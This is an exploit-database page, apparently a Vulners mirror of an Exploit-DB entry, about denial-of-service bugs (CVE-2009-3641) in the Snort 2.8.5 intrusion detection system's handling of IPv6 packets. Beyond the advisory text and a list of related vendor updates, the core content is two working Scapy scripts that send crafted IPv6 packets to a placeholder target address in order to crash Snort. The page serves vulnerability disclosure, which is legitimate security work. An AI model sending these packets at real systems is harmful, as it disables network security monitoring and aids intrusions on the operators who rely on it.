Lucene search
+L

Snort 2.8.5 - Multiple Denial of Service Vulnerabilities

🗓️ 22 Oct 2009 00:00:00Reported by laurent gaffieType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 20 Views

Snort 2.8.5 Denial-of-Service Vulnerabilities IPv

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-3641
22 Oct 200900:00
circl
CVE
CVE-2009-3641
28 Oct 200914:00
cve
Cvelist
CVE-2009-3641
28 Oct 200914:00
cvelist
Debian CVE
CVE-2009-3641
28 Oct 200914:00
debiancve
Exploit DB
Snort 2.8.5 - IPv6 Denial of Service
23 Oct 200900:00
exploitdb
Fedora
[SECURITY] Fedora 10 Update: snort-2.8.5.1-1.fc10
24 Nov 200907:35
fedora
Fedora
[SECURITY] Fedora 11 Update: snort-2.8.5.1-1.fc11
24 Nov 200907:51
fedora
Tenable Nessus
Fedora 10 : snort-2.8.5.1-1.fc10 (2009-10751)
25 Nov 200900:00
nessus
Tenable Nessus
Fedora 11 : snort-2.8.5.1-1.fc11 (2009-10783)
25 Nov 200900:00
nessus
NVD
CVE-2009-3641
28 Oct 200914:30
nvd
Rows per page
source: https://www.securityfocus.com/bid/36795/info

Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.

Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.

These issues affect Snort 2.8.5; other versions may also be vulnerable.

You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)

1) #only works on x86

#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP

2) # works x86,x64

#/usr/bin/env python
from scapy.all import *

z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 May 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.38779
20